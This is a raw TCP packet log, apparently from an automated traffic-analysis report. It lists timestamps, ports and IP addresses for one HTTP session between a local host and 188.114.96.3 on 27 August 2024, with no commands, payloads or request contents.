                                Aug 27, 2024 09:49:39.851201057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851203918 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.851212978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851221085 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.851223946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851236105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851253033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851258993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.851258993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.851264000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851289988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.851522923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851532936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851572990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.851665020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851676941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851732016 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.851744890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851757050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851768017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851780891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.851782084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851794004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851807117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851808071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.851833105 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.851888895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851901054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851912022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851926088 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.851937056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.852077961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852091074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852099895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852111101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852123022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852128029 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.852135897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852145910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852158070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852169991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852169991 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.852195024 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.852219105 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.852232933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852243900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852255106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852266073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852277040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852277040 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.852288961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852299929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852299929 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.852309942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852320910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852324963 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.852351904 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.852376938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852380037 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.852386951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852427959 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.852590084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852602005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852612972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852628946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.852638960 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.852665901 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.852767944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.898644924 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.940130949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.940145969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.940216064 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.940274000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.940289021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.940299034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.940310001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.940324068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.940335989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.940346003 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.940381050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.940392971 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.940408945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.940419912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.940432072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.940443039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.940459967 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.940459967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.940473080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.940489054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.940493107 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.940516949 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.941011906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941020966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941055059 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.941193104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941204071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941215038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941225052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941236019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941236019 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.941248894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941260099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941262007 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.941298962 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.941309929 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.941337109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941349030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941365004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941378117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941392899 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.941418886 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.941534042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941545963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941555977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941569090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941580057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941589117 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.941598892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941611052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941613913 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.941622972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941633940 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.941634893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941660881 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.941720963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941732883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941764116 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.941900969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941912889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941922903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941937923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941943884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941951990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.941955090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941968918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.941977024 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.942002058 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.942692995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.942704916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.942737103 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.942867994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.942878962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.942890882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.942903042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.942912102 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.942914963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.942926884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.942939043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.942950964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.942954063 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.942960978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.942975044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.942991972 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.943018913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943031073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943042040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943052053 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.943054914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943065882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943077087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943097115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.943097115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.943341970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943352938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943365097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943377018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943382978 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.943388939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943399906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943408012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.943412066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943428040 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.943454981 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.943480968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943496943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943510056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943541050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.943676949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943689108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943700075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943711042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.943712950 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.943736076 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.992345095 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.133941889 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.138967037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.236068010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.236726046 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.241530895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338432074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338450909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338483095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338519096 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.338530064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338548899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338562012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338573933 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.338612080 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.338687897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338699102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338710070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338725090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338731050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.338737965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338754892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338767052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338782072 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.338804007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338809013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.338815928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338824987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338843107 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.338866949 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.338897943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338911057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338924885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338957071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.338962078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338972092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338983059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.338998079 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339026928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339075089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339086056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339096069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339107990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339123011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339123964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339135885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339140892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339147091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339188099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339241028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339251995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339262009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339282036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339283943 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339293957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339304924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339309931 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339318037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339329004 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339329958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339340925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339350939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339354038 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339364052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339378119 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339427948 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339560032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339572906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339584112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339595079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339606047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339613914 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339617014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339628935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339641094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339654922 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339659929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339673042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339680910 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339684010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339701891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339713097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339725018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339759111 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339777946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339792013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339801073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339812994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339819908 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339823008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339834929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339849949 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339853048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339864969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.339881897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.339895964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340007067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340018988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340035915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340046883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340050936 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340058088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340068102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340076923 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340085983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340090990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340096951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340107918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340118885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340125084 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340138912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340159893 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340182066 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340203047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340219021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340274096 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340533972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340545893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340555906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340565920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340576887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340579033 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340589046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340599060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340604067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340610027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340620995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340627909 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340631962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340636969 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340643883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340655088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340667009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340678930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340682983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340688944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340728998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340759039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340769053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340779066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340795994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340799093 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340806961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340816975 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340820074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340831041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340842962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340853930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340862036 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340864897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340877056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340884924 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340889931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340898991 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340902090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340912104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340919018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340923071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340934992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340945005 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340975046 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.340980053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.340991974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341017008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.341101885 CEST8049715188.114.96.3192.168.2.8
